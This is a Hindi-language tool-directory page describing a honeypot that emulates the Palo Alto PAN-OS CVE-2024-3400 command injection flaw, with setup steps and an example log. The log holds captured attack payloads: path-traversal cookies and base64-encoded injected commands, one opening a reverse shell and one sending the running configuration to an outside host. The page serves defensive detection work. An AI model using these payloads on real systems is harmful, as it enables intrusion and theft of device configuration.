Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-3400-pot — CVE-2024-3400 Palo Alto PAN-OS कमांड इंजेक्शन भेद्यता के लिए सरल हनीपॉट | Kitploit
उपकरण/GitHubGitHub/zam89/cve-2024-3400-pot
रक्षात्मक उपकरणवेब सुरक्षाखतरा खुफियाघुसपैठ का पता लगानाघटना प्रतिक्रिया
GitHubzam89/cve-2024-3400-pot

CVE-2024-3400-pot

CVE-2024-3400 Palo Alto PAN-OS कमांड इंजेक्शन भेद्यता के लिए सरल हनीपॉट

रिपॉजिटरी देखें
6112 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-3400-pot

CVE-2024-3400 Palo Alto PAN-OS कमांड इंजेक्शन भेद्यता के लिए सरल हनीपॉट।

विशेषताएं

  • /global-protect/login.esp पर जाने पर अनुकरण करें (GlobalProtect पोर्टल का लॉगिन पेज)
  • HTTP अनुरोध POST /ssl-vpn/hipreport.esp और Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/<file>; का अनुकरण करें
  • कुकी से फ़ाइल नाम निकालें (यदि मौजूद हो)
  • POST अनुरोध की सामग्री को फ़ाइल में सहेजें
  • अनुकरण करें यदि उपयोगकर्ता GET /global-protect/portal/images/<file> का अनुरोध करता है, तो उपयोगकर्ता को 404 के बजाय 403 प्राप्त होगा
  • अनुरोध का IP और User-Agent एकत्र करें

पूर्वापेक्षाएँ

  • आपके सर्वर पर Python 3.x स्थापित हो।

  • Python PIP

    • pip install flask
  • OpenSSL के साथ एक स्व-हस्ताक्षरित प्रमाणपत्र और निजी कुंजी उत्पन्न करें:

    root@kitploit:~
    $ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365
      
      Enter PEM pass phrase:
      Verifying - Enter PEM pass phrase:
      -----
      You are about to be asked to enter information that will be incorporated
      into your certificate request.
      What you are about to enter is what is called a Distinguished Name or a DN.
      There are quite a few fields but you can leave some blank
      For some fields there will be a default value,
      If you enter '.', the field will be left blank.
      -----
      Country Name (2 letter code) [XX]:XX
      State or Province Name (full name) []:XX
      Locality Name (eg, city) [Default City]:
      Organization Name (eg, company) [Default Company Ltd]:XX
      Organizational Unit Name (eg, section) []:XX
      Common Name (eg, your name or your server's hostname) []:XX
      Email Address []:XX
    
    • निजी कुंजी से पासफ़्रेज़ हटाएं:
    root@kitploit:~
    $ openssl rsa -in key.pem -out key1.pem
    Enter pass phrase for key.pem:
    writing RSA key
    
    $ mv key1.pem key.pem
    

उपयोग

हनीपॉट शुरू करने के लिए, निम्न कमांड चलाएं:

root@kitploit:~
sudo nohup python3 CVE-2024-3400-pot.py &
disown
  • जांचें कि स्क्रिप्ट चल रही है या नहीं:
root@kitploit:~
sudo netstat -lnput | grep 443
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      1208/python3

sudo ps aux | grep <PID>
sonic        1208  0.0  3.5 189448 34364 pts/0    S    00:35   0:17 python3 CVE-2024-3400-pot.py

उदाहरण लॉग

root@kitploit:~
INFO:werkzeug:WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on https://127.0.0.1:443
 * Running on https://<IP>:443
INFO:werkzeug:Press CTRL+C to quit
INFO:root:Request from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36, Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/rdpj22uy8h.txt;
WARNING:root:Detected suspicious file creation attempt: rdpj22uy8h.txt from 45.61.138.35
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
WARNING:root:Suspicious file requested - rdpj22uy8h.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "GET /global-protect/portal/images/rdpj22uy8h.txt HTTP/1.1" 403 -
WARNING:root:Suspicious file requested - rdpj22uy8h_test.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:root:Request from 158.255.213.74, User-Agent: python-requests/2.25.1, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/test`echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTguMjU1LjIxMy43NC82MDU0NCAwPiYx|base64${IFS}-d|bash`
INFO:werkzeug:158.255.213.74 - - [23/Apr/2024 04:46:48] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
INFO:root:Request from 92.119.159.68, User-Agent: curl/7.58.0, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/aaba`echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgb3M7IG9zLnBvcGVuKCJjdXJsIC1rIC1YIFBPU1QgLWQgQC9vcHQvcGFuY2ZnL21nbXQvc2F2ZWQtY29uZmlncy9ydW5uaW5nLWNvbmZpZy54bWwgaHR0cHM6Ly8xODUuMTA0LjE5NC40NzoxMDAwMiIpJw==|base64${IFS}-d|bash`
INFO:werkzeug:92.119.159.68 - - [24/Apr/2024 15:17:45] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -

टूल डाउनलोड करें